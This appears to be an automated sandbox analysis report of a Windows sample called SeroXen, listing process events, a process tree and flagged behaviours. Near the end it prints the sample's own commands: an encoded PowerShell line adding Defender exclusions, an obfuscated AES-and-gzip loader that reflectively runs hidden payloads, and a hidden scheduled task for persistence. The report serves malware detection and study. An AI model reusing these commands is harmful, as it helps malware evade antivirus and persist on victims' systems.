chrome.exedescription pid process Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
Processes:
chrome.exe7zG.exeExplorer.EXEpid process 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 5676 7zG.exe 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE -
Suspicious use of SendNotifyMessage 27 IoCs
Processes:
chrome.exeExplorer.EXEpid process 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
OpenWith.exepowershell.exeExplorer.EXEpid process 1084 OpenWith.exe 1984 powershell.exe 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 4008 wrote to memory of 5064 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 5064 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 868 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4432 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4432 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe PID 4008 wrote to memory of 4976 4008 chrome.exe chrome.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\SeroXen.rar2⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe8753ab58,0x7ffe8753ab68,0x7ffe8753ab783⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2928 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4372 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4376 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4656 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level3⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff791ffae48,0x7ff791ffae58,0x7ff791ffae684⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5048 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4616 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3264 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4772 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5192 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4760 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5368 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5212 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Users\Admin\Downloads\7z2407-x64.exe"C:\Users\Admin\Downloads\7z2407-x64.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:23⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\SeroXen\" -spe -an -ai#7zMap19308:94:7zEvent325812⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAaQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAegBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZABuACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Uni.bat" "3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Windows\Uni.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_215_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.vbs"5⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.bat" "6⤵
-
